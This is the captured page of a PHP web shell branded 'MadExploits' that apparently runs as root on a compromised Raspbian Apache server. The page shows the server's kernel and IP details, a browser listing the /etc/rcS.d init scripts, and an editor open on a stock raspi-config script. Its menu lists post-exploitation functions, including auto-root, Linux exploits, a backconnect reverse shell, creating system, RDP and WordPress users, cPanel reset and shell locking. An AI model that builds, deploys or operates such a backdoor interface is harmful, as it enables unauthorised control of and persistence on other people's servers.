Linux lorencats.com 5.10.103-v7l+ #1529 SMP Tue Mar 8 12:24:00 GMT 2022 armv7l
Apache/2.4.59 (Raspbian)
: 10.0.0.29 | : 216.73.216.15
Cant Read [ /etc/named.conf ]
7.3.31-1~deb10u7
root
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
etc /
rcS.d /
[ HOME SHELL ]
Name
Size
Permission
Action
K01hwclock.sh
3.72
KB
-rwxr-xr-x
K01nfs-common
5.53
KB
-rwxr-xr-x
K01rpcbind
2.42
KB
-rwxr-xr-x
S01alsa-utils
5.21
KB
-rwxr-xr-x
S01apparmor
3.65
KB
-rwxr-xr-x
S01fake-hwclock
824
B
-rwxr-xr-x
S01keyboard-setup.sh
1.44
KB
-rwxr-xr-x
S01kmod
2
KB
-rwxr-xr-x
S01networking
4.34
KB
-rwxr-xr-x
S01plymouth-log
752
B
-rwxr-xr-x
S01procps
924
B
-rwxr-xr-x
S01raspi-config
1.18
KB
-rwxr-xr-x
S01udev
6.71
KB
-rwxr-xr-x
S01x11-common
2.69
KB
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : S01raspi-config
#!/bin/sh ### BEGIN INIT INFO # Provides: raspi-config # Required-Start: udev mountkernfs $remote_fs # Required-Stop: # Default-Start: S 2 3 4 5 # Default-Stop: # Short-Description: Switch to ondemand cpu governor (unless shift key is pressed) # Description: ### END INIT INFO . /lib/lsb/init-functions case "$1" in start) log_daemon_msg "Checking if shift key is held down" if [ -x /usr/sbin/thd ] && timeout 1 thd --dump /dev/input/event* | grep -q "LEFTSHIFT\|RIGHTSHIFT"; then printf " Yes. Not enabling ondemand scaling governor" log_end_msg 0 else printf " No. Switching to ondemand scaling governor" SYS_CPUFREQ_GOVERNOR=/sys/devices/system/cpu/cpu0/cpufreq/scaling_governor if [ -e $SYS_CPUFREQ_GOVERNOR ]; then echo "ondemand" > $SYS_CPUFREQ_GOVERNOR echo 50 > /sys/devices/system/cpu/cpufreq/ondemand/up_threshold echo 100000 > /sys/devices/system/cpu/cpufreq/ondemand/sampling_rate echo 50 > /sys/devices/system/cpu/cpufreq/ondemand/sampling_down_factor fi log_end_msg 0 fi ;; stop) ;; restart) ;; force-reload) ;; *) echo "Usage: $0 start" >&2 exit 3 ;; esac
Close